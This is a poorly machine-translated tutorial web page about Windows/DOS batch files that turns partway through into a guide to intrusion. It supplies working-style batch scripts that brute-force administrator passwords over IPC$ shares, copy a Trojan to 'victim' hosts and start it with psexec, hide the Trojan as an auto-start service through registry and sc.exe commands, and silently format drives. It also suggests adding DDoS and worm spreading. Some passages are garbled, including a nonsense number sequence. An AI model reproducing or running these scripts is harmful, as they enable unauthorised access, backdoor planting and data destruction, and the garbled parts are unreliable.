What is the meaning of using batch files 01/19 Update SLTechnology News&Howtos

What is the meaning of using batch files

2025-01-19 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Development >

Shulou(Shulou.com)06/03 Report--

This article mainly introduces the significance of the use of batch files, has a certain reference value, interested friends can refer to, I hope you can learn a lot after reading this article, let the editor take you to understand it.

A file with the suffix bat is a batch file, a text file. To put it simply, its function is to automatically execute multiple commands in succession, and the content of the batch file is a command. So what's the use of it?

For example, when you start the wps software, you must execute the

C:\ > cd wps

C:\ WPS > spdos

C:\ WPS > py

C:\ WPS > wbx

C:\ WPS > wps

Do you find it troublesome to do this every time before using WPS?

If there is a method, just write a batch file, will automatically execute all the commands, do you want to learn?

You will be surprised when you finish reading this section and the first batch file you wrote executes smoothly.

In addition, every time the computer starts up, it will look for the batch file autoexec.bat, so that it can execute some commands that must be executed every time it starts, such as setting the path path, loading mouse driver mouse, disk acceleration smartdrv, and so on, which can make your computer truly automated.

Echo, @, call, pause, and rem are the most commonly used commands for batch files, so let's start with them. Echo indicates the characters after this command is displayed

Echo off means that all commands that run after this statement do not display the command line itself

@ is similar to echo off, but it is added first to the other command lines, indicating that the command line itself is not displayed at run time.

Call calls another batch file (if another batch file is called directly, subsequent commands of the current file cannot be executed after that file is executed)

Pause running this sentence will pause and display Press any key to continue... Wait for the user to press any key before continuing

Rem indicates that the character after this command is an interpretation line, which is not executed, but is only used for future search.

Example: edit the a.bat file with edit, enter the following contents and save it to c:\ a.bat. After executing the batch file, you can write all the files in the root directory to a.txt, start UCDOS, enter WPS and other functions.

The contents of the batch file are as follows: the file represents:

Echo off does not display the command line

Dir c:\ *. * > a.txt writes the list of files on disk c to a.txt

Call c:\ ucdos\ ucdos.bat calls ucdos

Hello, echo. Display "Hello".

Pause pauses and waits for the button to continue

Rem using wps annotations will use wps

Cd ucdos enters the ucdos directory

Wps uses wps

Parameters can also be used in batch files like the C language, which requires only one parameter representation%.

% represents a parameter, which is a string added to the file name when running a batch file. Variables can range from% 0 to% 9jue% 0 to represent the file name itself, and strings are represented in the order from% 1 to% 9.

For example, C: under the root directory, the batch processing file name is f.bat and the content is format% 1

Then if you execute C:\ > f a:, what is actually executed is format a:

Another example is C: the name of the batch file under the root directory is t.bat, and the content is type% 1 type% 2.

Then running C:\ > t a.txt b.txt will display the contents of the a.txt and b.txt files sequentially

If goto choice for is a more advanced command in batch files, and if you are adept at using these commands, you are an expert in batch files.

If said it would determine whether the specified conditions were met and then decide to execute different orders. There are three formats:

1. If "parameter" = = "string" command to be executed

If the parameter is equal to the specified string, the condition holds, run the command, otherwise run the next sentence. (note that there are two equal signs)

For example, if "% 1" = "a" format a:

2. If exist file name command to be executed

If there is a specified file, the condition is established, run the command, otherwise run the next sentence. Such as if exist config.sys edit config.sys

3. If errorlevel digital commands to be executed

If the return code is equal to the specified number, the condition holds, run the command, otherwise run the next sentence. For example, when the if errorlevel 2 goto x2 DOS program runs, it will return a number to DOS, which is called error code errorlevel or return code.

When the goto batch file runs here, it jumps to the label specified by goto, which is generally used with if. Such as:

Goto end

: end

Echo this is the end

The label is represented by a string, and the line in which the label is located is not executed.

Choice uses this command to allow the user to enter a character to run different commands. The / c: parameter should be added when in use, and the characters that can be prompted for input should be written after c:, with no space between them. Its return code is 1234...

Such as: choice / c:dme defrag,mem,end

Will be displayed

Defrag,mem,end [D,M,E]?

For example, test.bat has the following content:

@ echo off

Choice / c:dme defrag,mem,end

If errorlevel 3 goto defrag should first judge the error code with the highest value.

If errorlevel 2 goto mem

If errotlevel 1 goto end

: defrag

C:\ dos\ defrag

Goto end

: mem

Mem

Goto end

: end

Echo good bye

After this file is run, it will display defrag,mem,end [DJI MJE]? The user can select d me, and then the if statement will make a judgment. D means to execute the program segment labeled defrag, m means to execute the program segment labeled mem, e means to execute the program segment labeled end, and each program segment finally jumps the program to the end label with goto end, and then the program will display good bye and the file will end.

The for loop command executes the same command multiple times as long as the conditions are met.

Format FOR [% f] in (collection) DO [command]

Execute the command as long as the parameter f is within the specified set

If there is a line in a batch file:

For% c in (* .bat * .txt) do type% c

This means that if it is a file that ends in bat or txt, the contents of the file are displayed.

DOS automatically runs the autoexec.bat file when it starts, and we usually load the necessary programs in it, such as: path (set path), smartdrv (disk acceleration), mouse (mouse boot), mscdex (optical drive connection), doskey (keyboard management), set (set environment variables) and so on.

If this file is not in the boot disk directory, the computer will ask the user to enter the date and time.

For example, a typical autoexec.bat content is as follows:

@ echo off does not display the command line

There is a directory prompt in front of the prompt $psigg setting prompt

Path c:\ dos;c:\; c:\ windows;c:\ ucdos;c:\ tools set the path

Lh c:\ dos\ doskey.com load keyboard management

Lh c:\ mouse\ mouse.com load mouse management

Lh c:\ dos\ smartdrv.exe load disk acceleration Management

Lh c:\ dos\ mscdex / S / D:MSCD000 / CD-ROM 12 / V load the CD-ROM driver

Set temp=c:\ temp set up a temporary directory

A batch file is an unformatted text file that contains one or more commands. It has a file extension of .bat or .cmd. Type the name of the batch file at the command prompt, or double-click the batch file, and Cmd.exe is called to run the commands one by one in the order in which they appear in the file. Using batch files, also known as batch programs or scripts, can simplify daily or repetitive tasks. Of course, the main content of our version is to introduce some practical applications of batch processing in intrusion, such as patching the system with batch files, batch implantation of backdoor programs, and so on. Let's start our study tour of batch processing.

one。 A brief introduction to simple batch Internal commands

1.Echo command

Turn on or off the request echo feature, or display messages. If there are no parameters, the echo command displays the current echo settings.

Grammar.

Echo [{on off}] [message]

Sample:@echo off / echo hello world

In practical application, we will combine this command with redirection symbols (also known as pipe symbols, usually use > > ^) to input some commands into files of a specific format. This will be reflected in future examples.

2.@ command

Indicates that the commands after @ are not displayed, so during the invasion (such as using batch processing to format the enemy's hard drive), you will not be able to let the other party see the commands you are using.

Sample:@echo off

@ echo Now initializing the program,please wait a minite...

@ format X: / q/u/autoset (the / y parameter is not allowed in the format command. Fortunately, Microsoft left us an autoset parameter, and the effect is the same as / y.)

3.Goto command

Specify to jump to the label, and when the tag is found, the program will process the command that starts on the next line.

Syntax: goto label (label is a parameter that specifies the lines in the batch program to be directed to. )

Sample:

If {% 1} = = {} goto noparms

If {% 2} = {} goto noparms (if you don't understand the if,% 1,% 2 here, skip it first, and there will be a detailed explanation later. )

@ Rem check parameters if null show usage

: noparms

Echo Usage: monitor.bat ServerIP PortNumber

Goto end

The name of the tag can be chosen at will, but it is better to have a meaningful letter, preceded by a letter: to indicate that the letter is a label, and the goto command is based on this: to find the next step to jump there. You'd better have some instructions so that you and others will seem to understand your intentions.

4.Rem command

The comment command, which is equivalent to / *-/ in the C language, is not executed, but acts as a comment for others to read and you to modify later.

Rem Message

Sample:@Rem Here is the description.

5.Pause command

When you run the Pause command, the following message is displayed:

Press any key to continue. . .

Sample:

@ echo off

: begin

Copy aRom back. * d:\

Echo Please put a new disk into driver A

Pause

Goto begin

In this example, all files on disk in drive An are copied to d:\ back. When the comment that appears prompts you to put another disk in drive A, the pause command suspends the program so that you can replace the disk and press any key to continue processing.

6.Call command

Calls from one batch program to another without terminating the parent batch program. The call command accepts the label that is used as the target of the call. If you use Call outside of a script or batch file, it will not work on the command line.

Grammar.

Call [[Drive:] [Path] FileName [BatchParameters]] [: label [arguments]]

Parameters.

[Drive:} [Path] FileName

Specifies the location and name of the batch program to be called. The filename parameter must have a .bat or .cmd extension.

7.start command

Call external programs, all DOS commands and command-line programs can be called by the start command.

Common parameters of intrusion:

Window minimization at the beginning of MIN

SEPARATE starts a 16-bit Windows program in a separate space

HIGH starts the application in the HIGH priority category

REALTIME starts the application in the REALTIME priority category

WAIT starts the application and waits for it to finish

Parameters these are the parameters passed to the command / program

When the executing application is a 32-bit GUI application, CMD.EXE returns a command prompt without waiting for the application to terminate. If executed within a command script, the new behavior does not occur.

8.choice command

Such as: choice / c:dme defrag,mem,end

Will be displayed

Defrag,mem,end [D,M,E]?

Sample:

The Sample.bat is as follows:

@ echo off

Choice / c:dme defrag,mem,end

If errorlevel 3 goto defrag (the error code with the highest value should be judged first)

If errorlevel 2 goto mem

If errotlevel 1 goto end

: defrag

C:\ dos\ defrag

Goto end

: mem

Mem

Goto end

: end

Echo good bye

9.If command

If said it would determine whether the specified conditions were met and then decide to execute different orders. There are three formats:

1. If "parameter" = = "string" command to be executed

If the parameter is equal to the specified string, the condition holds, run the command, otherwise run the next sentence. (note that there are two equal signs)

For example, if "% 1" = "a" format a:

If {% 1} = = {} goto noparms

If {% 2} = = {} goto noparms

2. If exist file name command to be executed

If there is a specified file, the condition is established, run the command, otherwise run the next sentence.

Such as if exist config.sys edit config.sys

3. If errorlevel / if not errorlevel digital commands to be executed

If the return code is equal to the specified number, the condition holds, run the command, otherwise run the next sentence.

Such as if errorlevel 2 goto x2

When the DOS program runs, it will return a number to DOS, which is called error code errorlevel or return code. The common return codes are 0,1.

10.for command

The for command is a complex command, which is mainly used for parameters to cycle through the command within a specified range.

Use% variable to specify variables when using the FOR command in a batch file

For {% variable%% variable} in (set) do command [CommandLineOptions]

% variable specifies a parameter that can be replaced by a single letter.

(set) specify a file or group of files. You can use wildcards.

Command specifies the commands to be executed on each file.

Command-parameters specifies parameters or command line switches for specific commands.

Use% variable to specify variables when using the FOR command in a batch file

Instead of using% variable. Variable names are case-sensitive, so% I is different from% I

If the command extension is enabled, the following additional FOR command formats are subject to

Support:

FOR / D% variable IN (set) DO command [command-parameters]

If the set contains wildcards, the assignment matches the directory name, not the file name.

FOR / R [[drive:] path]% variable IN (set) DO command [command-

Check the directory tree rooted in [drive:] path and point to the FOR statement in each directory. If no directory is specified after / R, the current directory is used. If the set is only a single point (.) Character, the directory tree is enumerated.

FOR / L% variable IN (start,step,end) DO command [command-para

This set represents a sequence of numbers from beginning to end in increments.

Therefore, the sequence 1, 2, 3, 4, 5, 1, 2, 3, 4, 5, 5, 5, 4, 4, 5, 5, 5, 4, 4, 5, 5, 5, 5, 4, 4, 5, 5, 5, 4, 4, 5, 5, 4, 4, 5, 5, 5, 5, 5, 5, 5, 5, 4, 4, 5, 5, 5, 5, 5, 5, 4, 4, 4, 4, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 4, 4, 4, 4, 4, 5, 1, 4, 4, 4, 4, 5, 5, 4, 4, 4, 5, 5, 4, 4, 4, 5, 5, 4, 4, 4, 5, 1, 4,

Sequence (5-4-3-21).

FOR / F ["options"]% variable IN (file-set) DO command

FOR / F ["options"]% variable IN ("string") DO command

FOR / F ["options"]% variable IN (command) DO command

Or, if you have the usebackq option:

FOR / F ["options"]% variable IN (file-set) DO command

FOR / F ["options"]% variable IN ("string") DO command

FOR / F ["options"]% variable IN (command) DO command

Filenameset is one or more file names. Continue to the filenameset

Before the next file, each file has been opened, read, and processed.

Processing involves reading the file, dividing it into lines of text, and then dividing each line

Parse to zero or more symbols. Then use the value of the symbol string variable found

Call the For loop. By default, / F is separated by each line of each file

The first blank symbol of the Skip the blank line. You can specify the optional "options"

Parameter overrides the default resolution operation. This quoted string consists of one or more

Specify keywords for different parsing options. These keywords are:

Eol=c-refers to the end of a line comment character (just one)

Skip=n-refers to the number of lines ignored at the beginning of the file.

Delims=xxx-refers to the delimiter set. This replaces spaces and tabs

Default delimiter set.

Tokens=x,y,m-n-refers to which symbol of each line is passed to each iteration

The for itself. This results in an additional variable name

The format is a range. Specify m by nth symbol

The last character in a symbol string, an asterisk.

Then the extra variable will be parsed in the last symbol.

Assign and accept reserved text for lines.

Usebackq-specifies that the new syntax has been used in the following class cases:

Executes a string with quotation marks as a command and the quotation mark character is a text string command and allows the file name to be expanded with double quotation marks in fi.

Sample1:

FOR / F "eol=; tokens=2,3* delims=," I in (myfile.txt) do command

Each line in myfile.txt is parsed, those that begin with a semicolon are ignored, and the second and third symbols in each line are passed to the body of the for program; delimited with commas and / or spaces. Note that the statement in this for body refers to% I to get the second symbol,% j to get the third symbol, and% k to get all the remaining symbols after the third symbol. For file names with spaces, you need to enclose the file name in double quotes. To use double quotes in this way, you also need to use the usebackq option; otherwise, double quotes are understood to be used to define a string to be parsed.

% I is specified specifically in the for statement,% j and% k are specified through the

The tokens= option is specifically explained. You can specify up to 26 symbols through a tokens= line, as long as you don't try to specify a variable higher than the letter z or Z. Keep in mind that you cannot have more than 52 FOR variables in use when they are single-letter, case-sensitive, and global.

You can also use FOR / F parsing logic on adjacent strings by enclosing the filenameset between parentheses in single quotation marks. In this way, the string is treated as a single input line in a file.

Finally, you can analyze the output of the command with the FOR / F command. The way to do this is to change the filenameset between the parentheses into an anti-parenthesis string. The string is passed to a child CMD.EXE as a command line, and its output is grabbed into memory and parsed as a file. Therefore, the following examples:

FOR / F "usebackq delims=="% I IN (`set`) DO @ echo% I

Enumerates the environment variable names in the current environment.

In addition, the replacement of FOR variable references has been enhanced. You can now use the following

Option syntax:

~ I-remove any quotation marks ("), expand% I

% ~ fI-extends% I to a fully qualified pathname

% ~ dI-expand% I to only one drive letter

% ~ pI-extends% I to only one path

% ~ nI-extends% I to only one file name

% ~ xI-extends% I to only one file extension

% ~ sI-the extended path contains only short names

% ~ aI-extends% I to the file attributes of the file

% ~ tI-extends% I to the date / time of the file

% ~ zI-extends% I to the size of the file

% ~ $PATH:I-find the directory listed in the path environment variable and expand% I to the first fully qualified name found. If the environment variable is not defined, or if the file is not found, this key combination expands the empty string

You can combine modifiers to get multiple results:

% ~ dpI-extends% I to only one drive letter and path

% ~ nxI-extends% I only to a file name and extension

% ~ fsI-only extends% I to a full pathname with a short name

% ~ dp$PATH:i-find the directory listed in the path environment variable and expand% I to the first drive letter and path found.

% ~ ftzaI-extends% I to DIR with similar output lines

In the above example,% I and PATH can be replaced with other valid values. % ~ Grammar

Terminate with a valid FOR variable name. Selecting uppercase variable names like% I is easier to read and avoid confusion with case-insensitive key combinations.

The above is the official help of MS. Let's give a few examples to illustrate the use of the For command in an intrusion.

Sample2:

Use the For command to crack the brute force password of a target Win2k host.

We use net use\ ip\ ipc$ "password" / u: "administrator" to try to connect to the target host, and write down the password when successful.

The main command is one: for / fi% in (dict.txt) do net use\\ ip\ ipc$ "I%" / u: "administrator"

The password of admin is represented by I%. In dict.txt, the value of I% is connected with the net use command. Then pass the running result of the program to the find command--

For / fi%% in (dict.txt) do net use\\ ip\ ipc$ "I%%" / u: "administrator" find ": command completed successfully" > > D:\ ok.txt, so ko.

Sample3:

Have you ever had a lot of broilers waiting for you to plant backdoor + Trojans? When the number is very large, the originally very happy thing will become very depressed. The article begins with the use of batch files, which can simplify day-to-day or repetitive tasks. So how to achieve it? Ha ha, you will understand if you look at it.

There is only one main command: (when using the FOR command in a batch file, the specified variable uses% variable)

@ for / f "tokens=1,2,3 delims=" I in (victim.txt) do start call door.bat I j k

For the use of tokens, see sample1 above, where it means that the contents of victim.txt are passed sequentially to the parameter% I% j% k in door.bat.

And cultivate.bat is nothing more than using the net use command to establish an IPC$ connection, and copy Trojan + backdoor to victim, and then use the return code (If errorlever =) to screen the host that has successfully planted the backdoor, and echo it out, or echo to the specified file.

Delims= indicates that the content in the vivtim.txt is separated by a space. I want to see here, you must also understand what the content of this victim.txt is like. It should be arranged according to the objects represented by% I% j% k, which is usually ip password username.

Prototype code:

-cut here then save as a batchfile (I call it main.bat)-

@ echo off

@ if "% 1" = "" goto usage

@ for / f "tokens=1,2,3 delims=" I in (victim.txt) do start call IPChack.bat I j k

@ goto end

: usage

@ echo run this batch in dos modle.or just double-click it.

: end

-cut here then save as a batchfile (I call it main.bat)-

-cut here then save as a batchfile (I call it door.bat)-

@ net use\% 1\ ipc$% 3 / u: "% 2"

@ if errorlevel 1 goto failed

@ echo Trying to establish the IPC$ connection. OK

@ copy windrv32.exe\ 1\ admin$\ system32 & & if not errorlevel 1 echo IP 1 USER 2 PWD 3 > > ko.txt

@ psexec\% 1 c:\ winnt\ system32\ windrv32.exe

@ psexec\ 1 net start windrv32 & & if not errorlevel 1 echo 1 Backdoored > > ko.txt

: failed

@ echo Sorry can not connected to the victim.

-cut here then save as a batchfile (I call it door.bat)-

This is just a prototype of automatic backdoor batch processing, two batches and backdoor programs (Windrv32.exe), PSexec.exe needs to be placed in a unified directory. Batch processing content

It can also be extended, such as adding the function of clearing log + DDOS, adding the function of adding users regularly, and going deeper to make it have the function of automatic propagation (worm). There is no more description here. Interested friends can study it on their own.

two。 How to use parameters in batch files

Parameters can be used in batch processing, generally from 1% to 9%. When there are multiple parameters, you need to use shift to move them. This is rare, so we will not consider it.

Sample1:fomat.bat

@ echo off

If "% 1" = = "a" format a:

: format

@ format a:/q/u/auotset

@ echo please insert another disk to driver A.

@ pause

@ goto fomat

This example is used to format several floppy disks continuously, so when you use it, you need to type fomat.bat an in the dos window. Hehe, it seems to be a little superfluous.

Sample2:

When we want to set up an IPC$ connection, we always have to enter a long list of commands, which may lead to a wrong number, so we might as well write some fixed commands into a batch and assign the broiler ip password username as parameters to the batch, so that we don't have to type commands every time.

@ echo off

@ net use\ 1%\ ipc$ "2%" / u: "3%" Note, here PASSWORD is the second parameter.

@ if errorlevel 1 echo connection failed

Well, it's relatively easy to use parameters, right? You must have learned ^ _ ^. No.3 when you are so handsome

three。 How to use combined commands (Compound Command)

1. &

Usage: first command & second command [& third command.]

In this way, multiple commands can be executed at the same time, regardless of whether the command is successful or not

Sample:

C:\ > dir z: & dir c:\ Ex4rch

The system cannot find the path specified.

Volume in drive C has no label.

Volume Serial Number is 0078-59FB

Directory of c:\ Ex4rch

2002-05-14 23:51

2002-05-14 23:51 14 sometips.gif

Usage: the first command, the second command [the third command.]

In this way, multiple commands can be executed at the same time. When the correct command is executed, the subsequent command will not be executed, and if no correct command appears, all the commands will be executed all the time.

Sample:

C:\ Ex4rch > dir sometips.gif del sometips.gif

Volume in drive C has no label.

Volume Serial Number is 0078-59FB

Directory of C:\ Ex4rch

2002-05-14 23:55 14 sometips.gif

1 File (s) 14 bytes

0 Dir (s) 768696320 bytes free

Examples of the use of combined commands:

Sample:

@ copy trojan.exe\ 1\ admin$\ system32 & & if not errorlevel 1 echo IP 1 USER 2 PASS 3 > > victim.txt

Fourth, the use of pipeline commands

1. Command

Usage: the first command, the second command [the third command.]

Use the result of the first command as an argument to the second command, which is common in unix.

Sample:

Time / t > > D:\ IP.log

Netstat-n-p tcp find ": 3389" > D:\ IP.log

Start Explorer

Can you see that? Terminal Services allows us to customize the starting program for the user to run the following bat to get the IP of the logged-in user.

2. > output redirect command

The difference between redirecting a command or the output of a program to a specific file is that > clears the contents of the original file and writes to the specified file, while > > only appends the contents to the specified file. without changing the contents.

Sample1:

Echo hello world > c:\ hello.txt (stupid example?)

Sample2:

Nowadays, DLL Trojans are very popular. We know that system32 is a good place to play hide-and-seek. Many Trojans have sharpened their heads to drill there, and DLL horses are no exception. We can make a record of the EXE and DLL files in this directory after installing the system and necessary applications:

Run CMD-- to convert the directory to system32--dir * .exe > exeback.txt & dir * .dll > dllback.txt

So that the names of all EXE and DLL files are recorded in exeback.txt and dllback.txt, respectively.

In the future, if an anomaly is found but the problem cannot be found by the traditional method, it is necessary to consider whether the DLL Trojan has been sneaked into the system.

Then we use the same command to record the EXE and DLL files under system32 to other exeback1.txt and dllback1.txt, and then run:

CMD--fc exeback.txt exeback1.txt > diff.txt & fc dllback.txt dllback1.txt > diff.txt. (use the FC command to compare the DLL and EXE files before and after two times, and enter the results into diff.txt), so that we can find some extra DLL and EXE files, and then by looking at the creation time, version, whether it has been compressed, etc., we can easily determine whether it has been patronized by the DLL Trojan. No is the best, if there is, do not directly DEL off, first use regsvr32 / u trojan.dll to cancel the backdoor DLL file, and then move it to the Recycle Bin, if there is no abnormal reflection of the system, then delete it completely or submit it to the antivirus software company.

< 、>

&, & writes the output of one handle to the input of another.

> Sample.reg

@ echo [HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Run] > Sample.reg

@ echo "Invader" = "Ex4rch" > > Sample.reg

Echo "door" = 5 > > C:\\ WINNT\\ system32\\ door.exe > > Sample.reg

@ echo "Autodos" = dword:02 > > Sample.reg

Samlpe2:

When we use some older Trojans, we may generate a key under [HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Run (Runonce, Runservices, Runexec)] in the registry to realize the self-startup of Trojans. However, it is easy to expose the path of the Trojan program, resulting in the Trojan being checked and killed. relatively, it is relatively safe to register the Trojan program as a system service. Take the configured IRC Trojan DSNX as an example (named windrv32.exe)

@ start windrv32.exe

@ attrib + h + r windrv32.exe

@ echo [HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Run] > patch.dll

@ echo "windsnx" =-> > patch.dll

@ sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:\ winnt\ system32\ windrv32.exe

@ regedit / s patch.dll

@ delete patch.dll

REM [delete the startup key of DSNXDE in the registry, register it as a system critical service with sc.exe and set its properties to hidden and read-only, and config to self-startup]

@ REM, this is not safer ^ _ ^.

six。 A wonderful example will be released.

1. Delete the batch of default shares on the win2k/xp system

-cut here then save as .bat or .cmd file-

@ echo preparing to delete all the default shares.when ready pres any key.

@ pause

@ echo off

: Rem check parameters if null show usage.

If {% 1} = = {} goto: Usage

: Rem code start.

Echo.

Echo

Echo.

Echo Now deleting all the default shares.

Echo.

Net share 1 $/ delete

Net share 2 $/ delete

Net share 3 $/ delete

Net share 4 $/ delete

Net share 5 $/ delete

Net share 6 $/ delete

Net share 7 $/ delete

Net share 8 $/ delete

Net share 9 $/ delete

Net stop Server

Net start Server

Echo.

Echo All the shares have been deleteed

Echo.

Echo

Echo.

Echo Now modify the registry to change the system default properties.

Echo.

Echo Now creating the registry file

Echo Windows Registry Editor Version 5.00 > c:\ delshare.reg

Echo [HKEY_LOCAL_MACHINE\ SYSTEM\ CurrentControlSet\ Services\ lanmanserver\ parameters] > c:\ delshare.reg

Echo "AutoShareWks" = dword:00000000 > > c:\ delshare.reg

Echo "AutoShareServer" = dword:00000000 > > c:\ delshare.reg

Echo Nowing using the registry file to chang the system default properties.

Regedit / s c:\ delshare.reg

Echo Deleting the temprotarily files.

Del c:\ delshare.reg

Goto: END

: Usage

Echo.

Echo

Echo.

Echo ☆ An example for batch file ☆

Echo ☆ [Use batch file to change the sysytem share properties.] ☆

Echo.

Echo Author:Ex4rch

Echo Mail:Ex4rch@hotmail.com QQ:1672602

Echo.

Echo Error:Not enough parameters

Echo.

Echo ☆ Please enter the share disk you wanna delete ☆

Echo.

Echo For instance,to delete the default shares:

Echo delshare c de ipc admin print

Echo.

Echo If the disklable is not as C: D: E:, Please chang it youself.

Echo.

Echo example:

Echo If locak disklable are C: D: E: X: Y: Z:, you should chang the command into:

Echo delshare c de x y z ipc admin print

Echo.

Echo * you can delete nine shares once in a useing * *

Echo.

Echo

Goto: EOF

: END

Echo.

Echo

Echo.

Echo OK,delshare.bat has deleted all the share you assigned.

Echo.Any questions, feel free to mail to Ex4rch@hotmail.com.

Echo

Echo.

Echo

Echo.

: EOF

Echo end of the batch file

-cut here then save as .bat or .cmd file-

Thank you for reading this article carefully. I hope the article "what is the meaning of using batch files" shared by the editor will be helpful to everyone. At the same time, I also hope that you will support and pay attention to the industry information channel. More related knowledge is waiting for you to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.